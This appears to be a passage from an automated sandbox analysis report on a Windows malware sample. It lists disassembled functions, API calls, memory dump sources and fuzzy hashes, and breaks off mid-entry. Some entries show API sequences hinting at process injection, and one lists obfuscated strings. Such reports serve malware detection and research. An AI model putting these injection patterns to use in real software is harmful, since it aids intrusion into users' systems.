                                                                              • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                              • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                              Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                              • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                              • Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                              • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                              Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                              • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                              • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                              • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                              Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __lock_file_memset
                                                                              • String ID:
                                                                              • API String ID: 26237723-0
                                                                              • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                              • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                              • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                              • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                              Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              • __lock_file.LIBCMT ref: 00414EE4
                                                                                • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                              • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 717694121-0
                                                                              • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                              • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                              • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                              • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                              Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TranslateMessage.USER32(?), ref: 004098F6
                                                                              • DispatchMessageW.USER32(?), ref: 00409901
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchTranslate
                                                                              • String ID:
                                                                              • API String ID: 1706434739-0
                                                                              • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                              • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                              • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                              • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                              Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TranslateMessage.USER32(?), ref: 004098F6
                                                                              • DispatchMessageW.USER32(?), ref: 00409901
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchTranslate
                                                                              • String ID:
                                                                              • API String ID: 1706434739-0
                                                                              • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                              • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                              • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                              • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                              Function 03ECAEB5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 03ECB673
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ECB709
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ECB72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                              • Instruction ID: a6303ca87d3b447bccc0f0f5188f53fed01258f109de823108a696b70966b65e
                                                                              • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                              • Instruction Fuzzy Hash: CF12BF24A24658C6EB24DF64D8507DEB232EF68300F1061E9910DEB7A5E77A4E81CF5A
                                                                              Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                              Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                              • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                              • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                              • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                              Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                              • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                              Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                              • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                              Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                              • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: File$PointerWrite
                                                                              • String ID:
                                                                              • API String ID: 539440098-0
                                                                              • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                              • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                              • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                              • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                              Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                              • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                              Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                              • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                              Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                              • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                              • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                              • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                              Function 03ECBEB4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 03ECBEC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction ID: 77ff593a75e351fedb8c0d3a70c9deccd003cf3510c3d06744ef9d31149919c3
                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction Fuzzy Hash: 62E0BF7494014EEFDB00DFA8D6496EE7BB4EF04701F1006A5FD05D7680DB309E548A62
                                                                              Function 03ECBEB8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 03ECBEC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: 8f8b875088b035a2107260f5678fb48ebb7ab21485566e8312fc8005c46feaab
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: 82E0E67494014EDFDB00DFB8D6496AE7BB4EF04701F1002A5FD01D2280D6309D508A62

                                                                              Non-executed Functions

                                                                              Function 004045E0 Relevance: 81.9, Strings: 63, Instructions: 3193COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                              • API String ID: 0-4260964411
                                                                              • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                              • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                              Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
